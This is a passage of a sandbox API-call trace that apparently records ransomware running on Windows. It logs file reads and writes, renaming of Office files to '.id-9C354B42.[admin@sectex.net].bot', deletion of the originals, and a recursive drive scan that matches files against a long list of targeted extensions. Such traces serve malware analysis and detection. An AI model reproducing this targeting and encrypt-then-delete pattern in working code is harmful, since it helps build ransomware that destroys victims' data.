	[0170.698] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x13e, lpOverlapped=0x0) returned 1
	[0170.699] WriteFile (in: hFile=0x180, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x140, lpOverlapped=0x0) returned 1
	[0170.700] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.700] WriteFile (in: hFile=0x180, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0170.700] SetEndOfFile (hFile=0x180) returned 1
	[0170.700] CloseHandle (hObject=0x180) returned 1
	[0170.700] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.700] SetEndOfFile (hFile=0x3f0) returned 1
	[0170.703] CloseHandle (hObject=0x3f0) returned 1
	[0170.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.703] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.ico")) returned 1
	[0170.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.704] lstrlenW (lpString=".doc") returned 4
	[0170.704] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0170.704] lstrlenW (lpString=".docx") returned 5
	[0170.704] lstrcmpiW (lpString1=".docx", lpString2="M.ICO") returned -1
	[0170.704] lstrlenW (lpString=".pdf") returned 4
	[0170.704] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0170.704] lstrlenW (lpString=".xls") returned 4
	[0170.704] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0170.704] lstrlenW (lpString=".xlsx") returned 5
	[0170.704] lstrcmpiW (lpString1=".xlsx", lpString2="M.ICO") returned -1
	[0170.704] lstrlenW (lpString=".ppt") returned 4
	[0170.704] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0170.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.704] lstrlenW (lpString=".zip") returned 4
	[0170.704] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0170.704] lstrlenW (lpString=".rar") returned 4
	[0170.704] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0170.704] lstrlenW (lpString=".bz2") returned 4
	[0170.704] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0170.704] lstrlenW (lpString=".7z") returned 3
	[0170.704] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0170.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.704] lstrlenW (lpString=".dbf") returned 4
	[0170.704] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0170.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.704] lstrlenW (lpString=".1cd") returned 4
	[0170.704] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0170.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.704] lstrlenW (lpString=".jpg") returned 4
	[0170.704] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0170.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.705] lstrlenW (lpString=".doc") returned 4
	[0170.705] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0170.705] lstrlenW (lpString=".docx") returned 5
	[0170.705] lstrcmpiW (lpString1=".docx", lpString2="M.ICO") returned -1
	[0170.705] lstrlenW (lpString=".pdf") returned 4
	[0170.705] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0170.705] lstrlenW (lpString=".xls") returned 4
	[0170.705] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0170.705] lstrlenW (lpString=".xlsx") returned 5
	[0170.705] lstrcmpiW (lpString1=".xlsx", lpString2="M.ICO") returned -1
	[0170.705] lstrlenW (lpString=".ppt") returned 4
	[0170.705] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0170.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.705] lstrlenW (lpString=".zip") returned 4
	[0170.705] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0170.705] lstrlenW (lpString=".rar") returned 4
	[0170.705] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0170.705] lstrlenW (lpString=".bz2") returned 4
	[0170.705] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0170.705] lstrlenW (lpString=".7z") returned 3
	[0170.705] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0170.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.705] lstrlenW (lpString=".dbf") returned 4
	[0170.705] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0170.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.705] lstrlenW (lpString=".1cd") returned 4
	[0170.705] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0170.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO") returned 91
	[0170.705] lstrlenW (lpString=".jpg") returned 4
	[0170.705] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0170.706] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0170.706] lstrlenW (lpString="ALERT.ICO") returned 9
	[0170.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ALERT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\alert.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.709] GetFileSizeEx (in: hFile=0x180, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2606) returned 1
	[0170.709] CloseHandle (hObject=0x180) returned 1
	[0170.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ALERT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\alert.ico")) returned 0x20
	[0170.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ALERT.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\alert.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ALERT.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\alert.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.709] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.709] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\ALERT.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\alert.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 64
	os_tid = 0x78c

	[0137.500] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0xb4f2ff8
	[0137.501] lstrlenW (lpString="C:") returned 2
	[0137.501] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xae4fd00 | out: lpFindFileData=0xae4fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7ba8388
	[0137.501] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0137.501] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1
	[0137.501] lstrlenW (lpString="$Recycle.Bin") returned 12
	[0137.501] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1
	[0137.501] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0xb503000
	[0137.502] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0137.502] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0xae4fa84 | out: lpFindFileData=0xae4fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7ba83c8
	[0137.502] FindNextFileW (in: hFindFile=0x7ba83c8, lpFindFileData=0xae4fa84 | out: lpFindFileData=0xae4fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0137.502] FindNextFileW (in: hFindFile=0x7ba83c8, lpFindFileData=0xae4fa84 | out: lpFindFileData=0xae4fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1
	[0137.502] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0137.502] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1
	[0137.502] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46
	[0137.502] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1
	[0137.502] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0xb513008
	[0137.502] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0137.502] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0xae4f808 | out: lpFindFileData=0xae4f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7ba8408
	[0137.503] FindNextFileW (in: hFindFile=0x7ba8408, lpFindFileData=0xae4f808 | out: lpFindFileData=0xae4f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0137.503] FindNextFileW (in: hFindFile=0x7ba8408, lpFindFileData=0xae4f808 | out: lpFindFileData=0xae4f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2b18ec80, ftCreationTime.dwHighDateTime=0x1d58eee, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0137.503] lstrlenW (lpString="desktop.ini") returned 11
	[0137.503] lstrlenW (lpString=".1cd") returned 4
	[0137.503] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0137.503] lstrlenW (lpString=".3ds") returned 4
	[0137.503] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1
	[0137.503] lstrlenW (lpString=".3fr") returned 4
	[0137.503] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1
	[0137.503] lstrlenW (lpString=".3g2") returned 4
	[0137.503] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1
	[0137.503] lstrlenW (lpString=".3gp") returned 4
	[0137.503] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1
	[0137.503] lstrlenW (lpString=".7z") returned 3
	[0137.503] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0137.503] lstrlenW (lpString=".accda") returned 6
	[0137.503] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1
	[0137.503] lstrlenW (lpString=".accdb") returned 6
	[0137.503] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1
	[0137.503] lstrlenW (lpString=".accdc") returned 6
	[0137.503] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1
	[0137.503] lstrlenW (lpString=".accde") returned 6
	[0137.503] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1
	[0137.503] lstrlenW (lpString=".accdt") returned 6
	[0137.503] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1
	[0137.503] lstrlenW (lpString=".accdw") returned 6
	[0137.503] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1
	[0137.503] lstrlenW (lpString=".adb") returned 4
	[0137.503] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".adp") returned 4
	[0137.504] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".ai") returned 3
	[0137.504] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1
	[0137.504] lstrlenW (lpString=".ai3") returned 4
	[0137.504] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".ai4") returned 4
	[0137.504] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".ai5") returned 4
	[0137.504] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".ai6") returned 4
	[0137.504] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".ai7") returned 4
	[0137.504] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".ai8") returned 4
	[0137.504] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".anim") returned 5
	[0137.504] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1
	[0137.504] lstrlenW (lpString=".arw") returned 4
	[0137.504] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".as") returned 3
	[0137.504] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1
	[0137.504] lstrlenW (lpString=".asa") returned 4
	[0137.504] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".asc") returned 4
	[0137.504] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".ascx") returned 5
	[0137.504] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1
	[0137.504] lstrlenW (lpString=".asm") returned 4
	[0137.504] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".asmx") returned 5
	[0137.504] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1
	[0137.504] lstrlenW (lpString=".asp") returned 4
	[0137.504] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1
	[0137.504] lstrlenW (lpString=".aspx") returned 5
	[0137.505] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1
	[0137.505] lstrlenW (lpString=".asr") returned 4
	[0137.505] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".asx") returned 4
	[0137.505] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".avi") returned 4
	[0137.505] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".avs") returned 4
	[0137.505] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".backup") returned 7
	[0137.505] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1
	[0137.505] lstrlenW (lpString=".bak") returned 4
	[0137.505] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".bay") returned 4
	[0137.505] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".bd") returned 3
	[0137.505] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1
	[0137.505] lstrlenW (lpString=".bin") returned 4
	[0137.505] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".bmp") returned 4
	[0137.505] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".bz2") returned 4
	[0137.505] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".c") returned 2
	[0137.505] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1
	[0137.505] lstrlenW (lpString=".cdr") returned 4
	[0137.505] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1
	[0137.505] lstrlenW (lpString=".cer") returned 4
	[0137.506] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".cf") returned 3
	[0137.506] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1
	[0137.506] lstrlenW (lpString=".cfc") returned 4
	[0137.506] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".cfm") returned 4
	[0137.506] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".cfml") returned 5
	[0137.506] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1
	[0137.506] lstrlenW (lpString=".cfu") returned 4
	[0137.506] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".chm") returned 4
	[0137.506] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".cin") returned 4
	[0137.506] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".class") returned 6
	[0137.506] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1
	[0137.506] lstrlenW (lpString=".clx") returned 4
	[0137.506] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".config") returned 7
	[0137.506] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1
	[0137.506] lstrlenW (lpString=".cpp") returned 4
	[0137.506] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".cr2") returned 4
	[0137.506] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".crt") returned 4
	[0137.506] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".crw") returned 4
	[0137.506] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".cs") returned 3
	[0137.506] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1
	[0137.506] lstrlenW (lpString=".css") returned 4
	[0137.506] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1
	[0137.506] lstrlenW (lpString=".csv") returned 4
	[0137.507] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".cub") returned 4
	[0137.507] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dae") returned 4
	[0137.507] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dat") returned 4
	[0137.507] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".db") returned 3
	[0137.507] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1
	[0137.507] lstrlenW (lpString=".dbf") returned 4
	[0137.507] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dbx") returned 4
	[0137.507] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dc3") returned 4
	[0137.507] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dcm") returned 4
	[0137.507] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dcr") returned 4
	[0137.507] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".der") returned 4
	[0137.507] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dib") returned 4
	[0137.507] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dic") returned 4
	[0137.507] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".dif") returned 4
	[0137.507] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".divx") returned 5
	[0137.507] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1
	[0137.507] lstrlenW (lpString=".djvu") returned 5
	[0137.507] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1
	[0137.507] lstrlenW (lpString=".dng") returned 4
	[0137.507] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1
	[0137.507] lstrlenW (lpString=".doc") returned 4
	[0137.507] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".docm") returned 5
	[0137.508] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1
	[0137.508] lstrlenW (lpString=".docx") returned 5
	[0137.508] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0137.508] lstrlenW (lpString=".dot") returned 4
	[0137.508] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".dotm") returned 5
	[0137.508] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1
	[0137.508] lstrlenW (lpString=".dotx") returned 5
	[0137.508] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1
	[0137.508] lstrlenW (lpString=".dpx") returned 4
	[0137.508] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".dqy") returned 4
	[0137.508] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".dsn") returned 4
	[0137.508] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".dt") returned 3
	[0137.508] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1
	[0137.508] lstrlenW (lpString=".dtd") returned 4
	[0137.508] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".dwg") returned 4
	[0137.508] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".dwt") returned 4
	[0137.508] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".dx") returned 3
	[0137.508] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1
	[0137.508] lstrlenW (lpString=".dxf") returned 4
	[0137.508] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".edml") returned 5
	[0137.508] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1
	[0137.508] lstrlenW (lpString=".efd") returned 4
	[0137.508] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".elf") returned 4
	[0137.508] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1
	[0137.508] lstrlenW (lpString=".emf") returned 4
	[0137.509] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".emz") returned 4
	[0137.509] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".epf") returned 4
	[0137.509] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".eps") returned 4
	[0137.509] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1
	[0137.509] lstrlenW (lpString=".epsf") returned 5
	[0137.509] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1
